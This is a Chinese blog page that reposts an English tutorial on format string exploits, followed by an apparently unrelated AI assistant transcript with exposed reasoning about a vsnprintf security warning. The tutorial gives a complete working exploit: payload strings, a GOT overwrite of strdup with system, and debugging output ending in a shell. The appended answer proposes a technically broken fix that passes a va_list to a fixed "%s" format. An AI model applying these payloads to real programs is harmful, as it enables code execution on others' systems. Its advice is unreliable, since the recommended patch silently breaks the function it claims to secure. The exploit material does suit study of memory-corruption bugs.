format string attack

本文深入探讨了格式化字符串漏洞的工作原理及利用方法,通过实际案例详细解释如何通过该漏洞实现任意内存写入,最终达到代码执行的目的。
部署运行你感兴趣的模型镜像

下面的这两篇文章都讲得很好:


https://www.exploit-db.com/docs/28476.pdf

http://codearcana.com/posts/2013/05/02/introduction-to-format-string-exploits.html


现将上文的第二篇文章摘录如下:


How do format strings vulnerabilities work?

Format string vulnerabilities are a pretty silly class of bug that take advantage of an easily avoidable programmer error. If the programmer passes an attacker-controlled buffer as the argument to a printf (or any of the related functions, including sprintffprintf, etc), the attacker can perform writes to arbitrary memory addresses. The following program contains such an error:

#include<stdio.h>
int main(int argc, char** argv) {
    char buffer[100];
    strncpy(buffer, argv[1], 100);
    printf(buffer);
    return 0;
}

Since printf has a variable number of arguments, it must use the format string to determine the number of arguments. In the case above, the attacker can pass the string "%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p" and fool the printf into thinking it has 15 arguments. It will naively print the next 15 addresses on the stack, thinking they are its arguments:

$ ./a.out "%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p"
0xffffdddd 0x64 0xf7ec1289 0xffffdbdf 0xffffdbde (nil) 0xffffdcc4 0xffffdc64 (nil) 0x25207025 0x70252070 0x20702520 0x25207025 0x70252070 0x20702520

At about 10 arguments up the stack, we can see a repeating pattern of 0x252070 - those are our %ps on the stack! We start our string with AAAA to see this more explicitly:

$ ./a.out "AAAA%p %p %p %p %p %p %p %p %p %p"
AAAA0xffffdde8 0x64 0xf7ec1289 0xffffdbef 0xffffdbee (nil) 0xffffdcd4 0xffffdc74 (nil) 0x41414141

The 0x41414141 is the hex representation of AAAA. We now have a way to pass an arbitrary value (in this case, we're passing 0x41414141) as an argument to printf. At this point we will take advantage of another format string feature: in a format specifier, we can also select a specific argument. For example, printf("%2$x", 1, 2, 3) will print 2. In general, we can do printf("%<some number>$x") to select an arbitrary argument to printf. In our case, we see that 0x41414141 is the 10th argument to printf, so we can simplify our string1:

$ ./a.out 'AAAA%10$p'
AAAA0x41414141

So how do we turn this into an arbitrary write primitive? Well, printf has a really interesting format specifier: %n. From the man page of printf:

The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument. No argument is converted.

If we were to pass the string AAAA%10$n, we would write the value 4 to the address 0x41414141! We can use anotherprintf feature to write larger values: if we do printf("AAAA%100x"), 104 characters will be output (because %100x prints the argument padded to at least 100 characters). We can do AAAA%<value-4>x%10$n to write an arbitrary value to 0x41414141.

The next thing to know is that almost certainly don't want to write all characters in one go: for example, if we want to write the value 0x0804a004, we would have to write 134520836 characters to standard out! Instead, we break it up into two writes: first we write 0x0804 (2052) to the higher two bytes of the target address and then we write 0xa004 (40964) to the lower two bytes of the target address. To do this, we will use %hn to write only 2 bytes at a time. Such a format string might look like this: CAAAAAAA%2044x%10$hn%38912x%11$hn. Lets break this down so we can understand it.

  • CAAAAAAA - this is the higher two bytes of the target address (0x41414143) and the lower two bytes of the target address (0x41414141)
  • %2044x%10$hn - since we want to have written a total of 2052 bytes when we get to the first %hn, and we have already written 8 bytes so far, we need to write an addition 2044 bytes.
  • %38912x%11$hn - since we want to have written a total of 40964 bytes when we get to the second %hn, and we since we have already written 2052 bytes so far, we need to write an additional 38912 bytes.

Here is an example of how this might be used 2:

./a.out "$(python -c 'import sys; sys.stdout.write("CAAAAAAA%2044x%10$hn%38912x%11$hn")')"

What can we do with them?

Since a format string vulnerability gives us the ability to write an arbitrary value to an arbitrary address, we can do a lot of things with it. Usually the easiest thing to do is write to a function pointer somewhere and turn our arbitrary write primitive into arbitrary code execution. In dynamically linked programs, these are easy to find. When a program attempts to execute a function in a shared library, it does not necessarily know the location of that function at compile time. Instead, it jumps to a stub function that has a pointer to the correct location of the function in the shared library. This pointer (located in the global offset table, or GOT) is initialized at runtime when the stub function is first called.

For example, when strcat is used in a program, the following piece of stub code allows the program to find the correct location in the shared library libc at run time:

$ objdump -d a.out
... <snip> ...
08048330 <strcat@plt>:
 8048330:       ff 25 04 a0 04 08       jmp    *0x804a004
 8048336:       68 08 00 00 00          push   $0x8
 804833b:       e9 d0 ff ff ff          jmp    8048310 <_init+0x3c>
... <snip> ...

Here you can see that the stcat@plt is the stub function that jumps to GOT entry for strcat (the address 0x804a004), which is set at runtime to the location in libc of the strcat function. We can write any value we want to 0x804a004. When strcat is used later in the program, the program will instead transfer code execution to the value we specified. A common technique is to overwrite the GOT entry with the address of the function system, thereby turning a call of strcat(buffer, "hello") into the call system(buffer) (if we can control the contents of buffer, we can get a shell!).

An example

For an example, we will exploit the following C program:

#include <stdio.h>
#include <string.h>
// compile with gcc -m32 temp.c

int main(int argc, char** argv) {
  printf(argv[1]);
  strdup(argv[1]);
}

Our plan is going to be to overwrite the GOT entry of strdup with the address of system, so the program will printf(argv[1]) then system(argv[1]). Hence, our payload must be a valid argument to system - we will start our payload with sh;# (which will be sh and cause the rest of the payload to be a comment. This also has the advantage of being exactly 4 bytes long, which isn't important for this example but is very useful in other cases).

For every format string exploit, our payload will eventually look something like this: <address><address+2>%<number>x%<offset>$hn%<other number>x%<offset+1>$hn. We prepare a payload that will be the same length as our final payload so we can start computing the correct offsets and addresses (note that we use %hp and %00000x so we can just modify the string in the last step without modifying its length):

$ env -i ./a.out "$(python -c 'import sys; sys.stdout.write("sh;#AAAABBBB%00000x%17$hp%00000x%18$hp")')"
sh;#AAAABBBB00xf7fcbff48048449(nil)

Our goal is to find the correct offsets (instead of 17 and 18) so that the we output sh;#AAAABBBB<garbabe>0x41414141<garbage>0x42424242. This takes some work, but in our case the correct offsets are 99 and 100:

$ env -i ./a.out "$(python -c 'import sys; sys.stdout.write("sh;#AAAABBBB%00000x%99$hp%00000x%100$hp")')"
sh;#AAAABBBB00x4141414180484490x42424242

It is important to note that our payload is very sensitive to a change in length: adding one byte to the end of the string will change the required offsets and perhaps mess up the alignment.

$ env -i ./a.out "$(python -c 'import sys; sys.stdout.write("sh;#AAAABBBB%00000x%99$hp%00000x%100$hp")')A"
sh;#AAAABBBB00x2e00000080484490x6f2e612fA

This is because the arguments are passed onto the stack before the start of our program, and so changing the length of the arguments will change their alignment and the initial stack location for the program itself. In order to have our exploit work consistently, we need to ensure that the payload is at a consistent alignment (and at a consistent offset above us on the stack) by being careful to control the amount of stuff on the stack. This is also why we are using env -i as a wrapper for our program (it clears the environment, which is also passed onto the stack before the start of a program).

Anyways, lets find the strdup GOT entry:

$ objdump -d a.out
... <snip> ...
08048330 <strdup@plt>:
 8048330:       ff 25 04 a0 04 08       jmp    *0x804a004
 8048336:       68 08 00 00 00          push   $0x8
 804833b:       e9 d0 ff ff ff          jmp    8048310 <_init+0x3c>
... <snip> ...

Now we know where to write. We want to write the address of system to the strdup got entry, 0x804a004. For now, we plug in our address into the payload and make sure everything still works out:

$ env -i ./a.out "$(python -c 'import sys; sys.stdout.write("sh;#\x04\xa0\x04\x08\x06\xa0\x04\x08%00000x%99$hp%00000x%100$hp")')"
sh;#00x804a00480484490x804a006

The next step is to figure out where to write. First, since it is a 32 bit binary, we can disable libc randomization. We disable libc randomization via:

$ ulimit -s unlimited

Now the address of system is at a deterministic location in memory. We can just open up the program in gdb and print the address of system:

$ gdb -q a.out
Reading symbols from /home/ppp/a.out...(no debugging symbols found)...done.
(gdb) b main
Breakpoint 1 at 0x8048417
(gdb) r
Starting program: /home/ppp/a.out 

Breakpoint 1, 0x08048417 in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x555c2250 <system>

All right, now we know that we need to write 0x555c2250 (the address of system) to the address 0x804a004 (the got entry of strdup). We are doing this in two parts. First, we write 0x2250 to the two bytes at 0x804a004 then we write 0x555c to the two bytes at 0x804a006. We can figure out how many bytes to write in python:

$ python
>>> 0x2250 - 12 # We've already written 12 bytes ("sh;#AAAABBBB").
8772
>>> 0x555c - 0x2250 # We've already written 0x2250 bytes.
13068

Now we plug these values into our payload, change the %hp to %hn. Note that when we change the %00000x to %08772, we leave the leading 0 so that our string stays the same length. Here is the final exploit:

$ env -i ./a.out "$(python -c 'import sys; sys.stdout.write("sh;#\x04\xa0\x04\x08\x06\xa0\x04\x08%08772x%99$hn%13068x%100$hn")')"
sh;#..<garbage>..sh-4.2$ 

Woo hoo, we got our shell!

Debugging an exploit

Sometimes, things don't go as planned and we don't get a shell. If this happens, gdb is your friend. Unfortunately, gdb isn't a very good friend. It helpfully puts stuff in your environment, so any careful calculations you were doing related to the stack may no longer be valid. In order to resolve this, you need to make sure your environment looks like the environment used by gdb. We first see what the stack looks like under gdb and then always run our exploit with that environment:

$ env -i /usr/bin/printenv
$ gdb -q /usr/bin/printenv
Reading symbols from /usr/bin/printenv...(no debugging symbols found)...done.
(gdb) unset env
Delete all environment variables? (y or n) y
(gdb) r
Starting program: /usr/bin/printenv 
PWD=/home/ppp
SHLVL=0

Now that we know the environment used by gdb, we can make sure to always execute our payload with the same environment so we can test our exploit in gdb:

$ env -i PWD=$(pwd) SHLVL=0 ./a.out "$(python -c 'print "my_exploit_string"')" # Outside gdb.
$ gdb ./a.out # Inside gdb.
(gdb) unset env
Delete all environment variables? (y or n) y
(gdb) r "$(/usr/bin/python -c 'print "my_exploit_string"')"

The most helpful thing to do in gdb is to break just before the call to printf and make sure the argument and the stack stack is what you expect (if you expect to use %10$hn, make sure the value you control is the 10th argument after the format string). If that works, then break right after the call to printf and make sure the value you expect is at the target address.

Breakpoint 1, 0x080484ae in main ()
(gdb) x/2i $pc
=> 0x80484ae <main+74>: call   0x8048360 <printf@plt>
   0x80484b3 <main+79>: mov    $0x0,%eax
(gdb) x/a $esp
0xffffdb70: 0xffffdb98
(gdb) x/s 0xffffdb98
0xffffdb98:  "AAAA%10$p"
(gdb) x/11a $esp
0xffffdb70: 0xffffdb98  0xffffdddd  0x64    0xf7ec1289
0xffffdb80: 0xffffdbbf  0xffffdbbe  0x0 0xffffdca4
0xffffdb90: 0xffffdc44  0x0 0x41414141
(gdb) x/a $esp + 40
0xffffdb98: 0x41414141

  1. You'll note the single quotes - $ is a special symbol on the shell and would otherwise need to be escaped. 

  2. You'll note that we use print the exploit string in a python subshell. This isn't strictly necessary in this case, but for more interesting exploits the ability to print escape characters and use arbitrary bytes in our payload is very useful. We also print via sys.stdout.write to prevent the newline at the end we would get if we otherwise used print and surround the subshell in double quotes in case the payload had whitespace in it. 




您可能感兴趣的与本文相关的镜像

Python3.10

Python3.10

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

<think> 首先,用户的问题是:代码扫描中报告了一个问题,CID 16812131,关于非恒定的格式字符串。错误信息是:non const printf format string: format string is not a string literal, potential security vulnerability if user controlled。用户给出了代码行:ret = vsnprintf(&g_logBuf[cnt], format_len, (char*)format, arg); 用户问如何修改这行代码。 关键点是:格式字符串(format)不是字符串字面量,而是可能由用户控制的变量,这可能导致安全漏洞,比如格式字符串攻击(format string attack)。攻击者可以通过控制格式字符串来读取或写入内存。 修复方法是确保格式字符串是常量字符串字面量,或者至少是可信的、不可由用户控制的。但在这种情况下,用户似乎不能直接改变格式字符串,因为它是一个变量。 在给出的代码中,format 是一个变量,可能来自用户输入。安全做法是避免使用用户提供的格式字符串。 解决方案:应该使用固定的格式字符串,或者安全地处理格式字符串。如果格式字符串必须是动态的,需要确保它来自可信源。 一个常见的方法是使用一个预定义的格式字符串,而不是用户提供的。或者,使用函数如 snprintf 或 vsnprintf 时,确保格式字符串是常量。 在代码行中:ret = vsnprintf(&g_logBuf[cnt], format_len, (char*)format, arg); 这里,format 被用作格式字符串。为了修复,我可以修改为使用一个固定的格式字符串,或者如果必须支持动态格式,需要验证它。 但用户没有提供完整的上下文,所以我需要给出一般性建议。 修改建议:将格式字符串改为常量。例如,如果可能,用 "%s" 或其他合适的格式代替。 但用户代码中,format 可能用于不同的格式,所以可能不是那么简单。 另一个想法:使用安全的替代方法,比如只输出字符串而不解析格式。 但 vsnprintf 是用于格式化输出的。 更好的做法:重构代码,使格式字符串是硬编码的,或者从安全源获取。 例如,如果 format 是用户输入的,禁止它;否则,确保它是安全的。 在修复时,可以修改为: ret = vsnprintf(&g_logBuf[cnt], format_len, "%s", arg); 但这可能不工作,因为 arg 是 va_list,需要匹配格式。 arg 是 va_list,所以它依赖于格式字符串。 或许需要改变整个函数的设计。 常见修复:替换为使用固定的格式字符串,并调整参数。 但用户没有提供更多代码,所以我只能基于这行建议。 在安全编程中,推荐使用常量格式字符串。 所以,修改代码:假设原意是输出一个字符串,可以用: ret = vsnprintf(&g_logBuf[cnt], format_len, "%s", arg); 但 "%s" 期望一个字符串指针,而 arg 是 va_list,所以需要传递实际参数。 代码中:vsnprintf(char *str, size_t size, const char *format, va_list ap) 所以,arg 是 va_list。 在调用 vsnprintf 时,format 指定了参数类型。 如果 format 是动态的,攻击者可以注入 %n 或类似的东西。 修复:硬编码格式字符串。 但用户可能需要动态格式。所以,如果必须支持,需要 sanitize 格式字符串,移除危险序列,但这复杂且易错。 最好在代码审查中避免用户控制的格式字符串。 对于这个具体行,建议修改为使用固定的格式。 但用户没有说用途,所以我给出一般修改。 或许用户代码是日志函数的一部分,其中 format 是日志消息。 在安全日志中,应该只使用可信格式。 修改建议: 将 (char*)format 替换为一个常量字符串,比如 "%.*s" 或其他,但需要匹配参数。 由于 arg 是 va_list,参数必须与格式匹配。 所以,可能需要改变函数签名或实现。 一个安全的方法是使用 vsnprintf 但将格式字符串固定为 "%s",并确保参数是字符串。 例如: ret = vsnprintf(&g_logBuf[cnt], format_len, "%s", arg); 但 "%s" 期望一个 char*,而 arg 是 va_list,所以需要提取参数。 在代码中,arg 是 va_list,所以调用 vsnprintf 时,它使用 va_list 来处理参数。 如果格式是 "%s",那么 arg 应该指向一个字符串指针。 但在原代码,format 是动态的,所以参数类型动态变化。 为了安全,假设所有参数都是字符串,并固定格式为 "%s"。 但可能不适用,因为参数可能有不同类型。 另一个想法:使用 snprintf 或 vsnprintf 但只用于简单输出。 或许修改为: char buffer[some_size]; vsnprintf(buffer, sizeof(buffer), "Safe format: %s", arg); // 但 arg 需要匹配 不理想。 最好的实践是避免将用户输入作为格式字符串。 在修复中,我应该建议将格式字符串改为常量。 例如,修改为: ret = vsnprintf(&g_logBuf[cnt], format_len, "Log: %s", arg); 但同样,参数问题。 或许用户代码是: int log_function(char *format, ...) 然后有 va_list。 在扫描中,它警告 format 不是字面量。 修复:在调用点确保格式是字面量,但这里是在定义中。 对于这行代码,修改为使用固定格式。 但为了通用,我可以说:重构代码,使格式字符串是常量。 对于具体修改,建议使用: ret = vsnprintf(&g_logBuf[cnt], format_len, "%s", arg); 并调整参数。 但 arg 是 va_list,所以如果原意是输出一个字符串,可能工作。 用户代码:ret = vsnprintf(&g_logBuf[cnt], format_len, (char*)format, arg); 修改为:ret = vsnprintf(&g_logBuf[cnt], format_len, "%s", arg); 如果参数是字符串。 但可能不匹配。 另一个安全的方法是使用 vsprintf_s 或安全版本,如果编译器支持。 但标准 C 中,vsnprintf 是安全的,只要缓冲区大小正确,但格式字符串漏洞仍然存在。 所以,核心是格式字符串。 我找到的常见修复是硬编码格式或使用库来 sanitize。 但在响应中,我可以说: 将格式字符串改为常量,例如,如果输出简单消息,使用固定字符串。 例如: // 改为使用固定格式 ret = vsnprintf(&g_logBuf[cnt], format_len, "%s", arg); // 假设参数是字符串 或者 ret = vsnprintf(&g_logBuf[cnt], format_len, "Message: %s", arg); 但需要知道参数类型。 既然用户没有指定,我给出一般建议。 或许在上下文中,format 可以被信任,但扫描器警告。 为了消除警告,可以添加注释或忽略,但不安全。 更好的修复是改变设计。 在回答中,我可以说: 为了解决这个问题,您应该确保格式字符串是常量字符串字面量。如果可能,修改代码以使用固定的格式字符串。例如,如果该函数用于日志记录,考虑使用一个预定义的格式。 对于这行代码,修改为: ret = vsnprintf(&g_logBuf[cnt], format_len, "%s", arg); // 使用固定的格式字符串 "%s" 但确保 arg 对应于一个字符串参数。 如果参数不是字符串,需要适配。 由于用户可能无法更改签名,另一个方法是验证格式字符串,移除或转义 % 字符,但复杂。 简单修复:使用 snprintf 或类似,但格式固定。 我认为对于响应,建议使用固定格式。 现在,关于输出格式:我必须用中文回答。 用户说:"请使用中文回答问题" 所以,回答用中文。 然后,在回答后,必须提出3-5个相关问题,以 "§§相关问题§§" 开头,并在同一行,不换行。 相关问题基于用户的问题和我的回答。 用户问题:如何修改这行代码以修复安全漏洞。 我的回答:解释漏洞,建议修改为使用固定格式字符串。 相关问题示例: 1. 什么是格式字符串攻击? 2. 如何安全地处理动态格式字符串? 3. vsnprintf 函数的安全使用注意事项有哪些? 4. 在代码中如何防止类似的安全漏洞? 5. 有没有工具可以检测此类漏洞? 确保3-5个。 输出格式:先回答问题,然后"§§相关问题§§"后跟问题列表,用数字点,如1. ··· 2. ··· 等。 在"§§相关问题§§"后不换行,直接开始列表。 在示例中,是: §§相关问题§§ 1. ··· 2. ··· 所以,"§§相关问题§§"在单独一行,然后列表。 但注意说:"第一行必须完整且输出 \"§§相关问题§§\"!禁止换行分散。" 意思是"§§相关问题§§"必须在一行中完整输出,不能换行,然后直接跟问题列表,可能列表可以换行。 在示例中: §§相关问题§§ 1. ··· 2. ··· 所以,"§§相关问题§§"单独一行,然后问题列表。 "禁止换行分散" 可能指不要在"§§相关问题§§"内换行。 所以,输出时: 回答内容 §§相关问题§§ 1. 问题1 2. 问题2 3. 问题3 现在,撰写回答。 </think> ### 回答 代码扫描报告的问题(CID 16812131)指出,`vsnprintf` 函数中的格式字符串(`(char*)format`)不是字符串字面量(即非常量),这可能导致安全漏洞(如格式字符串攻击)。攻击者如果控制`format`参数,可能利用`%n`等格式化符读取或修改内存,造成信息泄露或程序崩溃。 要修复这行代码: ```c ret = vsnprintf(&g_logBuf[cnt], format_len, (char*)format, arg); ``` 建议修改为使用**固定的常量格式字符串**,避免用户控制格式。例如,如果原意是输出字符串,可将格式改为`"%s"`(确保`arg`对应一个字符串参数): ```c ret = vsnprintf(&g_logBuf[cnt], format_len, "%s", arg); // 使用固定格式字符串 ``` - **原因**:`"%s"`是安全的字符串字面量,它只将`arg`解释为字符串指针,避免解析恶意格式符。 - **注意事项**: - 如果`arg`不是字符串类型(如`int`或自定义结构),需调整格式字符串(如`"%d"`)以匹配参数类型。 - 如果必须支持动态格式,应确保`format`来自可信源(如内部配置),并对其进行过滤(移除`%n`等危险字符),但推荐硬编码格式以提升安全性。 - 检查整个函数上下文:如果`format`来自用户输入,重构函数设计,避免传递用户控制的格式字符串。 此修改消除了非恒定格式字符串的风险,符合安全编程规范。如果参数类型不匹配,需进一步调整代码逻辑。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值